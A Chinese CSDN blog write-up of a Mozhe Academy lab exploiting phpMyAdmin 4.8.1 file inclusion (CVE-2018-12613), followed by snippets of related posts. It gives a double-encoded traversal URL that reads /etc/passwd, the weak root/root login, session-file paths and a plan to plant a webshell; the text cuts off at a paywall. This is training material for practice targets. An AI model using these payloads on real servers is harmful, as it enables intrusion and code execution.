墨者学院CTF(phpMyAdmin后台文件包含分析溯源)

最新推荐文章于 2024-08-22 16:13:40 发布
最新推荐文章于 2024-08-22 16:13:40 发布
阅读量3.1k 收藏 4
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38963246/article/details/100737172
版权

墨者学院CTF(phpMyAdmin后台文件包含分析溯源)

靶场地址:
http://219.153.49.228:45122/
相关知识:

1.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
2.php代码审计
3.base64编码绕过

思路: 利用过滤规则绕过php文件包含的黑白名单限制,再利用php的session会话机制,包含一句话木马文件获取shell。
获取key(弱口令登录就省了root/root):

1.构造绕过白名单的url:http://219.153.49.228:45122/index.php?target=db_sql.php%253f/…/…/…/…/…/etc/passwd
测试结果,成功:在这里插入图片描述
2.执行SQL查询,写入一句话木马,此时由于php的session会话机制会把文件写入到服务器session的文件。
常见session文件的保存目录:
/var/lib/php/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
①.写入一句话木马

最低0.47元/天 解锁文章
痴人说梦梦中人
关注
专栏目录
phpmyadmin 文件包含(CVE-2014-8959)
千寻的博客
03-07 1837
- CNNVD编号:`CNNVD-201411-417 ` - 危害等级:` 中危 ` - CVE编号:` CVE-2014-8959 ` - 漏洞类型: `路径遍历 ` - 发布时间:` 2014-11-24 ` - 威胁类型: `远程 `
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1372
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
phpmyadmin文件包含
热门推荐
vergilben的学习日记
04-03 1万+
CVE-2018-12613 — 本地文件包含造成远程代码执行漏洞复现,其实就是我们常见的LFI漏洞。在我前面写的博客里面又详细介绍。这次我们直接进入墨者学院进行复现,不再自行搭建环境。 进入环境 这里使用弱口令进入,账号root,密码root。 进入之后页面如下: 执行sql语句挂入一句话木马 进入SQL执行页面 点击执行。 使用中国菜刀连接服务器 在根目录下我们发现key.txt文件,...
CTF部分基础知识二之PHP(二十五)】
最新发布
lianafany的博客
08-22 454
phpMyAdmin是众多MySQL图形化管理工具中使用最广泛的一种,是一款使用PHP开发的B/S模式的MySQL客户端软件,该工具是基于Web的跨平台的管理程序,支持简体中文。用户可以在其官方网站www.phpmyadmin.net上免费下载到最新的版本。phpMyAdmin为Web开发人员提供了类似于Access、SQL Server的图形化数据库操作界面,通过该管理工具可以对MySQL进行各种操作。
0x01.phpMyAdmin后台文件包含分析溯源
qq_31679787的博客
09-11 983
登录界面; phpmyadmin的默认账户名密码是root/空,或者是root/root,尝试后发现是root/root; 通过打开新的phpmyadmin窗口,发现所有参数; 根据cve-2018-12613漏洞可以得到网站根目录/var/www/html; 首先select '<?php phpinfo();?>';然后通过payload构造文件包含; payl...
phpmyadmin文件包含漏洞复现(CVE-2018-12613)
feng的博客
05-04 1189
前言 一个非常经典的漏洞了,以前只是直接拿payload打,还没认真的在本地复现过,看过漏洞的代码到底是怎么回事,所以今天从github上下载phpmyadmin4.8.1,到vps上然后复现一波,看一下代码的问题。 复现 漏洞出现在index.php的第61行: 存在任意文件包含,但是需要进入if才可以。 一层一层的来看,首先target不为空,而且是字符串,这很容易满足,而且不以index开头,而且不在黑名单中: $target_blacklist = array ( 'import.php'
墨者】靶场练习——phpMyAdmin后台文件包含分析溯源
weixin_63082823的博客
12-12 602
首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
墨者学院_phpMyAdmin后台文件包含分析溯源
cc_de_csdn的博客
08-22 2554
墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响 前台可以使用弱口令直接登录...
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 891
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
phpmyadmin-文件包含(CVE-2014-8959)
m0_65150886的博客
01-02 634
其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。用户名密码登陆pmatest/pmatest (phpMyAdmin)1.已知MySQL用户名和密码登录到phpmyadmin。3、包含根目录下1.gif等恶意文件。2.需要截断漏洞配合才能任意包含。构造URL,成功执行文件包含。1.访问ip:port。
Phpmyadmin文件包含漏洞(CVE-2018-12613)
jammny
11-28 341
漏洞简介 index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。该漏洞需要登录进phpmyadmin页面才能利用。 漏洞影响 phpMyAdmin 4.8.0、4.8.1版本 漏洞分析 https://blog.csdn.net/qq_33020901/article/details/80829269 漏洞利用 访问存在漏洞版本的页面 payload构造如下: http://192.168.30.128:8080/index.php?target=d
phpmyadmin文件包含漏洞
Hydra的博客
10-21 976
http://139.199.31.116:9008/index.php?target=db_sql.php%253f/../../../../../../flag.txt  
phpmyadmin漏洞_方兴未艾第3期 | phpMyAdmin文件包含漏洞
weixin_39884144的博客
11-30 231
phpMyAdmin文件包含漏洞Created 2020-07-22|Updated 2020-07-2201前言1.1CVE-2018-12613(phpMyAdmin文件包含漏洞)phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含漏洞,通过二次编码即可绕过检查1.2文件包含漏洞文件包含漏洞分为 本地文件包含(LFI) 和 ...
phpmyadmin后台文件包含漏洞分析
nareku的博客
04-10 6062
前言 在墨者学院看到这道题给的标签是文件包含,就想着拿来练练手,果然不练不知道一练吓一跳,里面还是有很多我没学到和不懂的知识,所以就打算单独拿出来写一篇博客来记录一下。
【漏洞复现-phpmyadmin-文件包含】CVE-2014-8959
10-14 2932
phpmyadmin-文件包含】鸡肋
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 549
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
墨者学院 windows硬盘文件分析取证(新建的用户名) 犯罪嫌疑人在使用过电脑之后并
12-15
墨者学院的Windows硬盘文件分析取证是一种通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机进行分析取证时,我们首先需要新建一个用户名。新建用户名的目的是为了保护我们操作的隐私和安全,以免意外地影响现有的用户设置或对系统产生不可逆的影响。这个新建的用户名仅用于分析取证过程。 一旦新建了用户名,我们可以开始进行分析取证工作。首先,我们会使用专业的取证软件对硬盘进行扫描,以找到潜在的关键文件和目录。通过恢复已删除的文件和检测隐藏的文件,我们可以获取更全面的信息。 接着,我们会对文件进行深入的分析。通过文件的创建时间、修改时间、访问记录等元数据信息,我们可以了解文件的活动轨迹。此外,我们还会查找关键词、犯罪工具、恶意软件等可能存在的证据。 在整个过程中,需要确保对取证工作的记录和操作都能被完整地保存下来,以确保后续的法律程序和证据呈现的可靠性。 综上所述,墨者学院的Windows硬盘文件分析取证可以帮助调查人员揭示犯罪嫌疑人的行为痕迹和相关证据,而新建的用户名则是为了保护我们操作的隐私和安全。通过有效的电脑取证工作,我们能够为正义的伸张提供有力的证据支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值